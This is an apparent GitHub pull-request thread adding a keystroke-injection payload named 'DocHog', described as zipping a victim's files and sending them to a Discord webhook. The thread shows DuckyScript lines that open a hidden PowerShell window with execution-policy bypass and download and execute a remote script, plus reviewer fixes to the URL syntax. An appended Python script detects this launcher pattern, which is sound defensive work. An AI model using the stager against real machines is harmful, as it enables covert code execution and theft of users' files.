New Payload - DocHog #366

Open
wants to merge 5 commits into base: master

atomiczsec
Contributor

No description provided.

REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

DEFINE URL http://new-url.com/powershell.ps1
Member

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
Member

this references $URL but your DEFINE is URL and should be #URL

@dallaswinger added the pending requested changes requires changes before merge label Oct 16, 2023
@atomiczsec
Contributor Author

@dallaswinger Here is the updated version, please lmk if there needs to be anything else done!

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr URL dl=1; iex $pl
Member

(Assuming you are attempting to call your definition for #URL) you need to have a # to call your definition

  STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URL dl=1; iex $pl

REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.

DEFINE #URL http://new-url.com/powershell.ps1
Member

Please change this to example.com

Including URLs
URLs used for retrieving staged code should refer exclusively to example.com using DEFINE in any payload submissions see Payload Configuration section below.
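
Added example, not part of the pull request or the project's code: a defender-side check that flags the launcher shape discussed in this thread (hidden window, no profile, non-interactive, execution-policy bypass, then `iwr` fed into `iex`) in process command lines. The sample log lines are constructed, and matching flags as case-insensitive prefixes of the full parameter names is an assumption of this sketch.

```python
import re

# Full powershell.exe parameter names; abbreviated flags are matched as
# prefixes (assumption of this example). "ep" is treated as an alias.
PARAMS = ("windowstyle", "noprofile", "noninteractive",
          "executionpolicy", "encodedcommand")
ALIASES = {"ep": "executionpolicy"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)

# Constructed process-creation command lines, not taken from the page.
SAMPLE = [
    "powershell -w h -NoP -NonI -ep Bypass $pl = iwr https://example.com/powershell.ps1; iex $pl",
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    "powershell -ExecutionPolicy Bypass -File C:\\Tools\\install.ps1",
    "powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass iex (iwr https://example.com/a.ps1)",
]

def expand(flag):
    """Map an abbreviated flag such as -NoP to its full parameter name."""
    name = flag.lstrip("-").lower()
    if name in ALIASES:
        return ALIASES[name]
    hits = [p for p in PARAMS if name and p.startswith(name)]
    return hits[0] if len(hits) == 1 else None  # ambiguous prefixes are ignored

def score(cmdline):
    """Return the set of launcher traits found in one command line."""
    tokens, traits = cmdline.split(), set()
    if not tokens or "powershell" not in tokens[0].lower():
        return traits
    for tok, nxt in zip(tokens[1:], tokens[2:] + [""]):
        param = expand(tok) if tok.startswith("-") else None
        if param == "windowstyle" and nxt and "hidden".startswith(nxt.lower()):
            traits.add("hidden-window")
        elif param == "executionpolicy" and nxt.lower() in ("bypass", "unrestricted"):
            traits.add("policy-bypass")
        elif param in ("noprofile", "noninteractive"):
            traits.add(param)
    if DOWNLOAD.search(cmdline) and EXECUTE.search(cmdline):
        traits.add("download-and-execute")
    return traits

def is_stager(cmdline):
    """Alert on download-and-execute combined with two or more launcher flags."""
    traits = score(cmdline)
    return "download-and-execute" in traits and len(traits - {"download-and-execute"}) >= 2

if __name__ == "__main__":
    for line in SAMPLE:
        print(is_stager(line), sorted(score(line)))
```

Requiring the download-and-execute pair plus at least two launcher flags keeps ordinary admin invocations such as `-NoProfile -File` from alerting.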

3 participants